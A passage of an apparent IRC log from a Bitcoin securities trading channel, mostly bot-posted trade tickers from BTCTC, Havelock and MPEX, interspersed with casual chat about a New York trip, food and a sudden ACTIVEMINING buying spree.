0.1543 BTC [+] Aug 21 23:43:01 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.001571 = 0.077 BTC [+] Aug 21 23:43:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.03086 = 1.543 BTC [+] Aug 21 23:45:16 [BTCTC] [LABCOIN] 30 @ 0.002311 = 0.0693 BTC [+] Aug 21 23:45:23 [BTCTC] [TAT.ASICMINER] 17 @ 0.03031 = 0.5153 BTC [-] Aug 21 23:45:24 [BTCTC] [TAT.ASICMINER] 45 @ 0.0303 = 1.3635 BTC [-] Aug 21 23:47:17 [BTCTC] [ASICMINER-PT] 1 @ 2.972 BTC [-] Aug 21 23:47:25 [BTCTC] [BITVPS] 1 @ 0.002388 BTC [-] Aug 21 23:47:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0302 = 0.151 BTC [-] Aug 21 23:47:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.03012 = 0.3012 BTC [-] Aug 21 23:47:38 [BTCTC] [TAT.ASICMINER] 29 @ 0.0301 = 0.8729 BTC [-] Aug 21 23:47:47 [BTCTC] [ASICMINER-PT] 1 @ 3.139 BTC [+] Aug 21 23:48:19 [BTCTC] [LABCOIN] 1 @ 0.002345 BTC [+] Aug 21 23:48:21 [BTCTC] [LABCOIN] 20 @ 0.002346 = 0.0469 BTC [+] Aug 21 23:48:32 [BTCTC] [ACTIVEMINING] 9 @ 0.004999 = 0.045 BTC [-] Aug 21 23:48:34 [BTCTC] [ACTIVEMINING] 35 @ 0.005 = 0.175 BTC [+] Aug 21 23:48:49 [BTCTC] [ASICMINER-PT] 1 @ 2.971 BTC [-] Aug 21 23:48:50 [BTCTC] [ASICMINER-PT] 2 @ 2.97 = 5.94 BTC [-] Aug 21 23:51:21 [HAVELOCK] [AM100] 1 @ 0.02865 BTC [-] Aug 21 23:52:44 [BTCTC] [DMS.MINING] 18 @ 0.0034 = 0.0612 BTC [+] Aug 21 23:54:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 21 23:54:45 [BTCTC] [DMS.MINING] 5 @ 0.003469 = 0.0173 BTC [+] Aug 21 23:54:46 [BTCTC] [DMS.MINING] 58 @ 0.003469 = 0.2012 BTC [+] Aug 21 23:54:47 [BTCTC] [DMS.MINING] 400 @ 0.00347 = 1.388 BTC [+] Aug 21 23:54:48 [BTCTC] [DMS.MINING] 40 @ 0.003479 = 0.1392 BTC [+] Aug 21 23:54:50 [BTCTC] [DMS.MINING] 297 @ 0.00348 = 1.0336 BTC [+] Aug 21 23:55:40 [BTCTC] [DMS.MINING] 24 @ 0.00348 = 0.0835 BTC [+] Aug 21 23:56:15 [BTCTC] [TAT.ASICMINER] 13 @ 0.03019 = 0.3925 BTC [+] Aug 21 23:56:17 [BTCTC] [TAT.ASICMINER] 33 @ 0.03018 = 0.9959 BTC [-] Aug 21 23:59:04 [BTCTC] [BFMINES] 1 @ 0.001101 BTC [-] Aug 21 23:59:07 [BTCTC] [BFMINES] 9 @ 0.0011 = 0.0099 BTC [-] Aug 22 00:00:20 [BTCTC] [DMS.MINING] 8 @ 0.00348 = 0.0278 BTC [+] Aug 22 00:02:32 [BTCTC] [TAT.ASICMINER] 32 @ 0.03016 = 0.9651 BTC [-] Aug 22 00:03:48 [BTCTC] [BTC-TRADING-PT] 11 @ 0.87 = 9.57 BTC [-] Aug 22 00:05:01 [BTCTC] [CB.IDIFF-O] 1 @ 0.00975 BTC [+] Aug 22 00:05:33 [BTCTC] [ACTIVEMINING] 1 @ 0.004999 BTC [-] Aug 22 00:07:37 [BTCTC] [DMS.SELLING] 1 @ 0.01776 BTC [-] Aug 22 00:08:08 [BTCTC] [ACTIVEMINING] 2 @ 0.004999 = 0.01 BTC [-] Aug 22 00:08:10 [BTCTC] [ACTIVEMINING] 14 @ 0.005 = 0.07 BTC [+] Aug 22 00:10:02 [BTCTC] [DMS.PURCHASE] 64 @ 0.02061 = 1.319 BTC [+] Aug 22 00:11:13 [BTCTC] [DMS.SELLING] 20 @ 0.01776 = 0.3552 BTC [-] Aug 22 00:11:38 [BTCTC] [ASICMINER-PT] 1 @ 2.983 BTC [+] Aug 22 00:12:49 [BTCTC] [ASICMINER-PT] 1 @ 2.972 BTC [-] Aug 22 00:12:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.03093 = 0.3712 BTC [+] Aug 22 00:12:53 [BTCTC] [ASICMINER-PT] 1 @ 2.971 BTC [-] Aug 22 00:13:01 [BTCTC] [ASICMINER-PT] 6 @ 2.97 = 17.82 BTC [-] Aug 22 00:13:57 [BTCTC] [ASICMINER-PT] 1 @ 2.971 BTC [+] Aug 22 00:13:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.03093 = 0.1237 BTC [+] Aug 22 00:14:00 [BTCTC] [ASICMINER-PT] 2 @ 2.97 = 5.94 BTC [-] Aug 22 00:14:06 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [-] Aug 22 00:14:30 [HAVELOCK] [AM100] 1 @ 0.0299 BTC [+] Aug 22 00:15:46 [BTCTC] [DMS.SELLING] 12 @ 0.01776 = 0.2131 BTC [-] Aug 22 00:16:27 [BTCTC] [DMS.MINING] 20 @ 0.003549 = 0.071 BTC [+] Aug 22 00:16:29 [HAVELOCK] [AM100] 4 @ 0.0299 = 0.1196 BTC [+] Aug 22 00:17:17 [BTCTC] [ASICMINER-PT] 1 @ 2.931 BTC [-] Aug 22 00:17:19 [BTCTC] [ASICMINER-PT] 6 @ 2.93 = 17.58 BTC [-] Aug 22 00:17:21 [BTCTC] [ASICMINER-PT] 1 @ 2.93 BTC [-] Aug 22 00:17:24 [BTCTC] [ASICMINER-PT] 3 @ 2.923 = 8.769 BTC [-] Aug 22 00:17:26 [BTCTC] [DMS.MINING] 7 @ 0.00355 = 0.0249 BTC [+] Aug 22 00:17:30 [BTCTC] [ASICMINER-PT] 10 @ 2.922 = 29.22 BTC [-] Aug 22 00:17:40 [BTCTC] [ASICMINER-PT] 1 @ 2.921 BTC [-] Aug 22 00:17:43 [BTCTC] [ASICMINER-PT] 1 @ 2.921 BTC [-] Aug 22 00:17:45 [BTCTC] [ASICMINER-PT] 2 @ 2.92 = 5.84 BTC [-] Aug 22 00:17:47 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Aug 22 00:18:01 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [-] Aug 22 00:18:03 [HAVELOCK] [HIM] 3 @ 0.1895 = 0.5685 BTC [+] Aug 22 00:18:05 [HAVELOCK] [HIM] 1 @ 0.179 BTC [-] Aug 22 00:18:07 [HAVELOCK] [HIM] 2 @ 0.17610042 = 0.3522 BTC [-] Aug 22 00:18:09 [HAVELOCK] [HIM] 100 @ 0.1751 = 17.51 BTC [-] Aug 22 00:18:28 [BTCTC] [ACTIVEMINING] 6 @ 0.004952 = 0.0297 BTC [-] Aug 22 00:18:29 [BTCTC] [ACTIVEMINING] 55 @ 0.004951 = 0.2723 BTC [-] Aug 22 00:18:31 [BTCTC] [ACTIVEMINING] 125 @ 0.00495 = 0.6188 BTC [-] Aug 22 00:18:32 [BTCTC] [ACTIVEMINING] 100 @ 0.004901 = 0.4901 BTC [-] Aug 22 00:18:33 [BTCTC] [ACTIVEMINING] 60 @ 0.0049 = 0.294 BTC [-] Aug 22 00:18:35 [BTCTC] [ACTIVEMINING] 1 @ 0.00482 BTC [-] Aug 22 00:18:44 [BTCTC] [ACTIVEMINING] 116 @ 0.004814 = 0.5584 BTC [-] Aug 22 00:18:45 [BTCTC] [ACTIVEMINING] 105 @ 0.004813 = 0.5054 BTC [-] Aug 22 00:18:46 [BTCTC] [ACTIVEMINING] 461 @ 0.00481 = 2.2174 BTC [-] Aug 22 00:18:47 [BTCTC] [ACTIVEMINING] 15 @ 0.00481 = 0.0722 BTC [-] Aug 22 00:18:48 [BTCTC] [ACTIVEMINING] 1 @ 0.00479 BTC [-] Aug 22 00:18:49 [BTCTC] [ACTIVEMINING] 60 @ 0.004726 = 0.2836 BTC [-] Aug 22 00:18:51 [BTCTC] [ACTIVEMINING] 300 @ 0.004725 = 1.4175 BTC [-] Aug 22 00:18:52 [BTCTC] [ACTIVEMINING] 175 @ 0.004704 = 0.8232 BTC [-] Aug 22 00:18:53 [BTCTC] [ACTIVEMINING] 483 @ 0.004703 = 2.2715 BTC [-] Aug 22 00:21:27 [BTCTC] [ACTIVEMINING] 30 @ 0.004879 = 0.1464 BTC [+] Aug 22 00:21:42 [BTCTC] [ACTIVEMINING] 30 @ 0.004879 = 0.1464 BTC [+] Aug 22 00:22:59 [BTCTC] [ACTIVEMINING] 30 @ 0.005021 = 0.1506 BTC [+] Aug 22 00:23:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005021 = 0.1506 BTC [+] Aug 22 00:24:09 [BTCTC] [ACTIVEMINING] 6 @ 0.00483 = 0.029 BTC [-] Aug 22 00:24:11 [BTCTC] [ACTIVEMINING] 1 @ 0.004815 BTC [-] Aug 22 00:24:41 [BTCTC] [ACTIVEMINING] 30 @ 0.004778 = 0.1433 BTC [-] Aug 22 00:24:44 [HAVELOCK] [AM100] 1 @ 0.02999 BTC [+] Aug 22 00:24:53 [BTCTC] [ACTIVEMINING] 30 @ 0.004777 = 0.1433 BTC [-] Aug 22 00:24:54 [BTCTC] [ACTIVEMINING] 38 @ 0.004778 = 0.1816 BTC [+] Aug 22 00:25:08 [BTCTC] [LABCOIN] 6 @ 0.002339 = 0.014 BTC [-] Aug 22 00:25:12 [BTCTC] [LABCOIN] 20 @ 0.002338 = 0.0468 BTC [-] Aug 22 00:25:16 [BTCTC] [LABCOIN] 1 @ 0.002332 BTC [-] Aug 22 00:25:17 [BTCTC] [LABCOIN] 405 @ 0.002302 = 0.9323 BTC [-] Aug 22 00:25:17 [BTCTC] [ACTIVEMINING] 30 @ 0.004779 = 0.1434 BTC [+] Aug 22 00:25:33 [BTCTC] [ACTIVEMINING] 30 @ 0.004779 = 0.1434 BTC [+] Aug 22 00:25:50 [BTCTC] [ACTIVEMINING] 30 @ 0.004779 = 0.1434 BTC [+] Aug 22 00:27:12 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:27:25 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:27:38 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:27:59 [BTCTC] [ACTIVEMINING] 15 @ 0.004981 = 0.0747 BTC [+] Aug 22 00:28:12 [BTCTC] [ACTIVEMINING] 6 @ 0.004981 = 0.0299 BTC [+] Aug 22 00:28:44 [BTCTC] [ACTIVEMINING] 1 @ 0.004971 BTC [-] Aug 22 00:29:29 [BTCTC] [ACTIVEMINING] 30 @ 0.004769 = 0.1431 BTC [-] Aug 22 00:29:38 [HAVELOCK] [AM100] 2 @ 0.02999 = 0.06 BTC [+] Aug 22 00:29:39 [HAVELOCK] [AM100] 5 @ 0.02999 = 0.15 BTC [+] Aug 22 00:29:41 [HAVELOCK] [AM100] 170 @ 0.03 = 5.1 BTC [+] Aug 22 00:29:44 [BTCTC] [ACTIVEMINING] 30 @ 0.004769 = 0.1431 BTC [-] Aug 22 00:30:03 [BTCTC] [ACTIVEMINING] 6 @ 0.004768 = 0.0286 BTC [-] Aug 22 00:30:04 [BTCTC] [ACTIVEMINING] 24 @ 0.004769 = 0.1145 BTC [+] Aug 22 00:30:15 [BTCTC] [LTC-MINING] 1 @ 0.2728 BTC [+] Aug 22 00:30:25 [BTCTC] [ACTIVEMINING] 30 @ 0.004768 = 0.143 BTC [-] Aug 22 00:31:29 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:31:47 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:31:59 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 22 00:32:10 [BTCTC] [ACTIVEMINING] 30 @ 0.004981 = 0.1494 BTC [+] Aug 22 00:32:38 [BTCTC] [BTC-TRADING-PT] 19 @ 0.87 = 16.53 BTC [-] Aug 22 00:33:18 [BTCTC] [TAT.MINIGAME] 1 @ 0.000241 BTC [+] Aug 22 00:34:15 [BTCTC] [BTC-GROWTH] 13 @ 0.09986 = 1.2982 BTC [+] Aug 22 00:34:16 [BTCTC] [BTC-GROWTH] 30 @ 0.09987 = 2.9961 BTC [+] Aug 22 00:34:17 [BTCTC] [BTC-GROWTH] 27 @ 0.09999 = 2.6997 BTC [+] Aug 22 00:34:19 [BTCTC] [BTC-GROWTH] 179 @ 0.1 = 17.9 BTC [+] Aug 22 00:34:51 [BTCTC] [ACTIVEMINING] 31 @ 0.004768 = 0.1478 BTC [-] Aug 22 00:34:54 [BTCTC] [ACTIVEMINING] 1 @ 0.004768 BTC [-] Aug 22 00:35:27 [BTCTC] [COGNITIVE] 1 @ 0.3162 BTC [-] Aug 22 00:35:40 [BTCTC] [COGNITIVE] 1 @ 0.3162 BTC [-] Aug 22 00:36:01 [BTCTC] [ACTIVEMINING] 30 @ 0.004839 = 0.1452 BTC [+] Aug 22 00:36:14 [BTCTC] [ACTIVEMINING] 30 @ 0.004838 = 0.1451 BTC [-] Aug 22 00:36:27 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 22 00:36:28 [BTCTC] [ACTIVEMINING] 30 @ 0.004839 = 0.1452 BTC [+] Aug 22 00:38:17 [BTCTC] [ACTIVEMINING] 30 @ 0.004971 = 0.1491 BTC [+] Aug 22 00:39:03 [BTCTC] [ACTIVEMINING] 1 @ 0.004971 BTC [+] Aug 22 00:39:14 [BTCTC] [ACTIVEMINING] 29 @ 0.004971 = 0.1442 BTC [+] Aug 22 00:39:27 [BTCTC] [ACTIVEMINING] 29 @ 0.004971 = 0.1442 BTC [+] Aug 22 00:40:11 [BTCTC] [ACTIVEMINING] 1 @ 0.004971 BTC [+] Aug 22 00:40:14 [BTCTC] [ACTIVEMINING] 1 @ 0.004971 BTC [+] Aug 22 00:40:29 [BTCTC] [ACTIVEMINING] 1 @ 0.004971 BTC [+] Aug 22 00:40:31 [BTCTC] [ACTIVEMINING] 1 @ 0.00497 BTC [-] Aug 22 00:40:37 [BTCTC] [ACTIVEMINING] 15 @ 0.004972 = 0.0746 BTC [+] Aug 22 00:40:52 [BTCTC] [ACTIVEMINING] 68 @ 0.004801 = 0.3265 BTC [-] Aug 22 00:40:53 [BTCTC] [ACTIVEMINING] 22 @ 0.0048 = 0.1056 BTC [-] Aug 22 00:41:07 [BTCTC] [ACTIVEMINING] 68 @ 0.0048 = 0.3264 BTC [-] Aug 22 00:41:19 [BTCTC] [ACTIVEMINING] 6 @ 0.004774 = 0.0286 BTC [-] Aug 22 00:41:32 [BTCTC] [ACTIVEMINING] 40 @ 0.004773 = 0.1909 BTC [-] Aug 22 00:42:04 [BTCTC] [ACTIVEMINING] 1 @ 0.004784 BTC [+] Aug 22 00:42:38 [BTCTC] [ACTIVEMINING] 30 @ 0.004839 = 0.1452 BTC [+] Aug 22 00:43:10 [BTCTC] [ACTIVEMINING] 1 @ 0.0048 BTC [-] Aug 22 00:43:25 [BTCTC] [ACTIVEMINING] 30 @ 0.004839 = 0.1452 BTC [+] Aug 22 00:47:30 [HAVELOCK] [XBOND] 10 @ 0.00106502 = 0.0107 BTC [-] Aug 22 00:47:35 [HAVELOCK] [XBOND] 70 @ 0.00106501 = 0.0746 BTC [-] Aug 22 00:47:42 [HAVELOCK] [XBOND] 158 @ 0.001065 = 0.1683 BTC [-] Aug 22 00:48:00 [HAVELOCK] [AM100] 4 @ 0.03 = 0.12 BTC [+] Aug 22 00:48:07 [HAVELOCK] [AM100] 4 @ 0.03 = 0.12 BTC [+] Aug 22 00:48:46 [HAVELOCK] [XBOND] 10 @ 0.001145 = 0.0115 BTC [+] Aug 22 00:49:01 [BTCTC] [ACTIVEMINING] 1 @ 0.004972 BTC [+] Aug 22 00:49:26 [BTCTC] [LABCOIN] 125 @ 0.002299 = 0.2874 BTC [-] Aug 22 00:49:27 [BTCTC] [LABCOIN] 299 @ 0.0023 = 0.6877 BTC [+] Aug 22 00:49:29 [BTCTC] [LABCOIN] 2000 @ 0.0023 = 4.6 BTC [+] Aug 22 00:49:37 [BTCTC] [ACTIVEMINING] 6 @ 0.005093 = 0.0306 BTC [+] Aug 22 00:49:39 [BTCTC] [ACTIVEMINING] 139 @ 0.005094 = 0.7081 BTC [+] Aug 22 00:55:39 [BTCTC] [ASICMINER-PT] 3 @ 2.92 = 8.76 BTC [+] Aug 22 00:57:13 [BTCTC] [LABCOIN] 20 @ 0.002301 = 0.046 BTC [+] Aug 22 00:57:13 [BTCTC] [LABCOIN] 2576 @ 0.0023 = 5.9248 BTC [-] Aug 22 00:57:29 [BTCTC] [ASICMINER-PT] 5 @ 2.919 = 14.595 BTC [-] Aug 22 00:57:30 [BTCTC] [ASICMINER-PT] 2 @ 2.92 = 5.84 BTC [+] Aug 22 00:58:44 [BTCTC] [ACTIVEMINING] 23 @ 0.005082 = 0.1169 BTC [-] Aug 22 00:58:55 [BTCTC] [LABCOIN] 904 @ 0.00228 = 2.0611 BTC [-] Aug 22 01:00:53 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00157 = 0.0031 BTC [-] Aug 22 01:01:57 [BTCTC] [LABCOIN] 85 @ 0.002281 = 0.1939 BTC [+] Aug 22 01:01:59 [BTCTC] [LABCOIN] 3096 @ 0.00228 = 7.0589 BTC [-] Aug 22 01:02:00 [BTCTC] [LABCOIN] 1715 @ 0.002278 = 3.9068 BTC [-] Aug 22 01:02:01 [BTCTC] [LABCOIN] 4400 @ 0.002275 = 10.01 BTC [-] Aug 22 01:02:02 [BTCTC] [LABCOIN] 440 @ 0.002275 = 1.001 BTC [-] Aug 22 01:03:01 [BTCTC] [ACTIVEMINING] 50 @ 0.005076 = 0.2538 BTC [-] Aug 22 01:03:36 [BTCTC] [LABCOIN] 20 @ 0.002261 = 0.0452 BTC [-] Aug 22 01:03:37 [BTCTC] [LABCOIN] 104 @ 0.00226 = 0.235 BTC [-] Aug 22 01:04:00 [BTCTC] [HOSTED-MINING] 1 @ 0.2798 BTC [+] Aug 22 01:04:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.03053 = 0.6106 BTC [-] Aug 22 01:04:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.03046 = 0.1523 BTC [-] Aug 22 01:04:15 [BTCTC] [TAT.ASICMINER] 25 @ 0.0303 = 0.7575 BTC [-] Aug 22 01:04:16 [BTCTC] [TAT.ASICMINER] 14 @ 0.03011 = 0.4215 BTC [-] Aug 22 01:04:17 [BTCTC] [TAT.ASICMINER] 36 @ 0.0301 = 1.0836 BTC [-] Aug 22 01:04:44 [BTCTC] [ASICMINER-PT] 1 @ 2.919 BTC [-] Aug 22 01:05:18 [BTCTC] [ASICMINER-PT] 1 @ 2.919 BTC [-] Aug 22 01:05:51 [HAVELOCK] [AM100] 17 @ 0.03 = 0.51 BTC [+] Aug 22 01:06:12 [BTCTC] [LABCOIN] 59 @ 0.00227 = 0.1339 BTC [+] Aug 22 01:07:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.03013 = 0.1507 BTC [+] Aug 22 01:07:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.03012 = 0.241 BTC [-] Aug 22 01:07:04 [BTCTC] [TAT.ASICMINER] 35 @ 0.0301 = 1.0535 BTC [-] Aug 22 01:07:05 [BTCTC] [TAT.ASICMINER] 40 @ 0.0301 = 1.204 BTC [-] Aug 22 01:07:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.02981 = 0.0894 BTC [-] Aug 22 01:07:08 [BTCTC] [TAT.ASICMINER] 15 @ 0.0298 = 0.447 BTC [-] Aug 22 01:07:29 [BTCTC] [ASICMINER-PT] 1 @ 2.919 BTC [-] Aug 22 01:07:32 Just got back from the NYC Aug 22 01:07:42 looks like I missed some things! Aug 22 01:07:45 Best city in the world Aug 22 01:07:56 yea dont nobody want no am anymore Aug 22 01:08:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.03091 = 0.1236 BTC [+] Aug 22 01:08:28 [BTCTC] [ASICMINER-PT] 4 @ 2.91 = 11.64 BTC [-] Aug 22 01:09:01 nope, no one Aug 22 01:09:24 [BTCTC] [DMS.PURCHASE] 6 @ 0.02061 = 0.1237 BTC [+] Aug 22 01:10:01 Well it seems that way for a lot of different assets atm lol Aug 22 01:10:27 I did enjoy NYC Aug 22 01:11:04 its a shithole Aug 22 01:11:07 met up with mjr too Aug 22 01:11:33 NYC is pretty "worn", yes Aug 22 01:11:35 Went through nyc during a business trip earlier this summer, good food. O yeah? Aug 22 01:11:48 [MPEX] [S.MPOE] 9305 @ 0.00082808 = 7.7053 BTC [-] Aug 22 01:12:21 take it back dub Aug 22 01:12:22 [BTCTC] [LABCOIN] 1 @ 0.002299 BTC [+] Aug 22 01:12:31 [BTCTC] [DMS.MINING] 2 @ 0.003548 = 0.0071 BTC [-] Aug 22 01:13:21 ny was great about 100 years ago. Aug 22 01:13:22 [BTCTC] [LABCOIN] 1 @ 0.002299 BTC [+] Aug 22 01:13:29 yeah the food was pretty awesome Aug 22 01:13:39 this is like saying rome is the best city in the world. well... sure, at some point it was. Aug 22 01:13:41 had etheopian and korean for the first time Aug 22 01:13:50 [HAVELOCK] [AM100] 1 @ 0.03239 BTC [+] Aug 22 01:13:51 ethiopian Aug 22 01:13:58 great stuff Aug 22 01:14:00 Korean for the first time? Aug 22 01:14:10 'murica fuck yeah Aug 22 01:14:11 food Aug 22 01:14:24 [BTCTC] [ASICMINER-PT] 1 @ 2.919 BTC [+] Aug 22 01:14:31 [MPEX] [S.MPOE] 5050 @ 0.00082891 = 4.186 BTC [+] Aug 22 01:14:39 Did you try Korean BBQ? Aug 22 01:14:43 [BTCTC] [DMS.PURCHASE] 6 @ 0.02024 = 0.1214 BTC [-] Aug 22 01:14:45 i' Aug 22 01:14:48 i'm vegan Aug 22 01:14:53 ah :) Aug 22 01:15:04 well, you can still bbq veggies Aug 22 01:15:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.03085 = 0.1234 BTC [-] Aug 22 01:15:33 the dumblings we got were BBQy Aug 22 01:15:37 dumplings Aug 22 01:15:52 Nice Aug 22 01:16:17 [BTCTC] [LABCOIN] 4 @ 0.002298 = 0.0092 BTC [-] Aug 22 01:17:08 [BTCTC] [LABCOIN] 1 @ 0.002298 BTC [-] Aug 22 01:18:10 [BTCTC] [ASICMINER-PT] 1 @ 2.901 BTC [-] Aug 22 01:18:12 [BTCTC] [ASICMINER-PT] 1 @ 2.901 BTC [-] Aug 22 01:18:13 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [-] Aug 22 01:18:14 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 22 01:18:16 [BTCTC] [ASICMINER-PT] 5 @ 2.891 = 14.455 BTC [-] Aug 22 01:18:17 [BTCTC] [ASICMINER-PT] 1 @ 2.882 BTC [-] Aug 22 01:18:18 [BTCTC] [ASICMINER-PT] 1 @ 2.873 BTC [-] Aug 22 01:18:19 [BTCTC] [ASICMINER-PT] 1 @ 2.872 BTC [-] Aug 22 01:18:20 [BTCTC] [ASICMINER-PT] 2 @ 2.871 = 5.742 BTC [-] Aug 22 01:18:21 [BTCTC] [ACTIVEMINING] 82 @ 0.005049 = 0.414 BTC [-] Aug 22 01:18:21 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Aug 22 01:18:22 [BTCTC] [ACTIVEMINING] 68 @ 0.00505 = 0.3434 BTC [+] Aug 22 01:18:23 [BTCTC] [ACTIVEMINING] 344 @ 0.005051 = 1.7375 BTC [+] Aug 22 01:18:24 [BTCTC] [ASICMINER-PT] 3 @ 2.866 = 8.598 BTC [-] Aug 22 01:18:25 [BTCTC] [ACTIVEMINING] 55 @ 0.005098 = 0.2804 BTC [+] Aug 22 01:18:26 [BTCTC] [ACTIVEMINING] 301 @ 0.005098 = 1.5345 BTC [+] Aug 22 01:18:27 [BTCTC] [ASICMINER-PT] 10 @ 2.865 = 28.65 BTC [-] Aug 22 01:18:28 [BTCTC] [ACTIVEMINING] 40 @ 0.005099 = 0.204 BTC [+] Aug 22 01:18:30 [BTCTC] [ACTIVEMINING] 469 @ 0.0051 = 2.3919 BTC [+] Aug 22 01:18:31 [BTCTC] [ACTIVEMINING] 1000 @ 0.0051 = 5.1 BTC [+] Aug 22 01:18:32 [BTCTC] [ACTIVEMINING] 100 @ 0.005149 = 0.5149 BTC [+] Aug 22 01:18:32 [BTCTC] [ACTIVEMINING] 500 @ 0.00515 = 2.575 BTC [+] Aug 22 01:18:33 [BTCTC] [ACTIVEMINING] 6 @ 0.005248 = 0.0315 BTC [+] Aug 22 01:18:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005249 = 0.1575 BTC [+] Aug 22 01:18:35 [BTCTC] [ACTIVEMINING] 4 @ 0.005344 = 0.0214 BTC [+] Aug 22 01:18:36 [BTCTC] [ACTIVEMINING] 22 @ 0.005345 = 0.1176 BTC [+] Aug 22 01:18:37 [BTCTC] [ACTIVEMINING] 4 @ 0.005349 = 0.0214 BTC [+] Aug 22 01:18:38 [BTCTC] [ACTIVEMINING] 20 @ 0.00535 = 0.107 BTC [+] Aug 22 01:18:39 [BTCTC] [ACTIVEMINING] 140 @ 0.005369 = 0.7517 BTC [+] Aug 22 01:18:40 [BTCTC] [ACTIVEMINING] 700 @ 0.00537 = 3.759 BTC [+] Aug 22 01:18:41 [BTCTC] [ACTIVEMINING] 462 @ 0.005398 = 2.4939 BTC [+] Aug 22 01:18:41 [BTCTC] [ACTIVEMINING] 200 @ 0.005399 = 1.0798 BTC [+] Aug 22 01:18:42 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Aug 22 01:18:43 [BTCTC] [ACTIVEMINING] 50 @ 0.0054 = 0.27 BTC [+] Aug 22 01:18:44 [BTCTC] [ACTIVEMINING] 1961 @ 0.0054 = 10.5894 BTC [+] Aug 22 01:18:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005449 = 0.0545 BTC [+] Aug 22 01:18:46 [BTCTC] [ACTIVEMINING] 50 @ 0.00545 = 0.2725 BTC [+] Aug 22 01:18:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005464 = 0.1639 BTC [+] Aug 22 01:18:48 [BTCTC] [ACTIVEMINING] 150 @ 0.005465 = 0.8198 BTC [+] Aug 22 01:18:49 [BTCTC] [ACTIVEMINING] 136 @ 0.005484 = 0.7458 BTC [+] Aug 22 01:18:50 [BTCTC] [ACTIVEMINING] 127 @ 0.005485 = 0.6966 BTC [+] Aug 22 01:18:51 [BTCTC] [ACTIVEMINING] 1000 @ 0.005489 = 5.489 BTC [+] Aug 22 01:18:51 [BTCTC] [ACTIVEMINING] 446 @ 0.005489 = 2.4481 BTC [+] Aug 22 01:18:53 [BTCTC] [ACTIVEMINING] 230 @ 0.00549 = 1.2627 BTC [+] Aug 22 01:18:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.00549 = 5.49 BTC [+] Aug 22 01:18:54 Wow Aug 22 01:18:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.005494 = 5.494 BTC [+] Aug 22 01:18:56 [BTCTC] [ACTIVEMINING] 15 @ 0.005498 = 0.0825 BTC [+] Aug 22 01:18:56 lotta ACTM Aug 22 01:18:57 [BTCTC] [ACTIVEMINING] 79 @ 0.005499 = 0.4344 BTC [+] Aug 22 01:18:58 [BTCTC] [ACTIVEMINING] 20 @ 0.005515 = 0.1103 BTC [+] Aug 22 01:18:59 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 22 01:19:00 [BTCTC] [ACTIVEMINING] 100 @ 0.005516 = 0.5516 BTC [+] Aug 22 01:19:01 [BTCTC] [ACTIVEMINING] 79 @ 0.005522 = 0.4362 BTC [+] Aug 22 01:19:02 [BTCTC] [ACTIVEMINING] 396 @ 0.005523 = 2.1871 BTC [+] Aug 22 01:19:03 [BTCTC] [ACTIVEMINING] 37 @ 0.00557 = 0.2061 BTC [+] Aug 22 01:19:04 [BTCTC] [ACTIVEMINING] 1850 @ 0.005571 = 10.3064 BTC [+] Aug 22 01:19:04 cocain is a helluva drug Aug 22 01:19:05 [BTCTC] [ACTIVEMINING] 776 @ 0.0056 = 4.3456 BTC [+] Aug 22 01:19:06 [BTCTC] [ACTIVEMINING] 211 @ 0.005625 = 1.1869 BTC [+] Aug 22 01:19:07 [BTCTC] [ACTIVEMINING] 422 @ 0.005629 = 2.3754 BTC [+] Aug 22 01:19:08 [BTCTC] [ACTIVEMINING] 10 @ 0.005667 = 0.0567 BTC [+] Aug 22 01:19:09 [BTCTC] [ACTIVEMINING] 73 @ 0.00571 = 0.4168 BTC [+] Aug 22 01:19:10 [BTCTC] [ACTIVEMINING] 121 @ 0.005725 = 0.6927 BTC [+] Aug 22 01:19:11 [BTCTC] [ACTIVEMINING] 100 @ 0.005745 = 0.5745 BTC [+] Aug 22 01:19:15 One of my favorite episodes lol Aug 22 01:19:22 dub esp if through a pipe Aug 22 01:19:22 anyone selling AM to buy ActM/Lab etc is pretty funny Aug 22 01:19:44 ThickAsThieves more like anyone trying to push a scam trying to make the most of what they perceive as "an opportunity" Aug 22 01:19:57 kinda nice of them, pay a little more to the traders. Aug 22 01:20:14 [BTCTC] [ACTIVEMINING] 63 @ 0.005332 = 0.3359 BTC [-] Aug 22 01:20:15 [BTCTC] [ACTIVEMINING] 50 @ 0.005333 = 0.2667 BTC [+] Aug 22 01:20:33 DAT BUY. Aug 22 01:20:36 